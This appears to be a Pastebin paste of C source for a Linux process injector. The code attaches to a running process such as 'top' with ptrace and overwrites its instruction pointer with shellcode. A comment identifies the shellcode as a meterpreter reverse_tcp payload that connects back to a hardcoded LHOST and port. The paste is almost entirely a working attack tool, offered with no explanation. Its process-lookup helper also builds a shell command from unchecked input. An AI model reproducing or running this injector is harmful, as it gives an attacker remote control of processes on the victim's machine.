Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <stdint.h>
- #include <unistd.h>
- #include <sys/types.h>
- #include <sys/ptrace.h>
- #include <sys/wait.h>
- #include <sys/user.h>
- #include <sys/reg.h>
- #define SHELLCODE_SIZE 128
- /*
- PAYLOAD = linux/x64/meterpreter/reverse_tcp
- LHOST = 192.168.43.40
- LPORT = 32415
- */
- unsigned char reverse[] =
- "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
- "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a"
- "\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00\x7e\x9f"
- "\xc0\xa8\x2b\x28\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f"
- "\x05\x59\x5e\x5a\x0f\x05\xff\xe6";
- int GetPID(char* PID_Name){
- FILE *fp;
- char pidcmd[50] = {0};
- int value = -1;
- if(PID_Name != 0){
- strcpy(pidcmd, "pidof ");
- strcat(pidcmd, PID_Name);
- strcat(pidcmd, "> /tmp/pidof");
- system(pidcmd);
- fp = fopen("/tmp/pidof", "r");
- fscanf(fp, "%d", &value);
- fclose(fp);
- }
- return value;
- }
- int inject_data (int pid, unsigned char *src, void *dst, int len)
- {
- int i;
- uint32_t *s = (uint32_t *) src;
- uint32_t *d = (uint32_t *) dst;
- for (i = 0; i < len; i+=4, s++, d++)
- {
- ptrace (PTRACE_POKETEXT, pid, d, *s);
- }
- return 0;
- }
- int main (int argc, char *argv[])
- {
- int target = GetPID("top"); //Process name ex: top, bash, mate-panel
- struct user_regs_struct regs;
- int syscall;
- long dst;
- ptrace (PTRACE_ATTACH, target, NULL, NULL);
- wait (NULL);
- ptrace (PTRACE_GETREGS, target, NULL, ®s);
- inject_data (target, reverse, (void*)regs.rip, SHELLCODE_SIZE);
- regs.rip += 2;
- ptrace (PTRACE_SETREGS, target, NULL, ®s);
- ptrace (PTRACE_DETACH, target, NULL, NULL);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement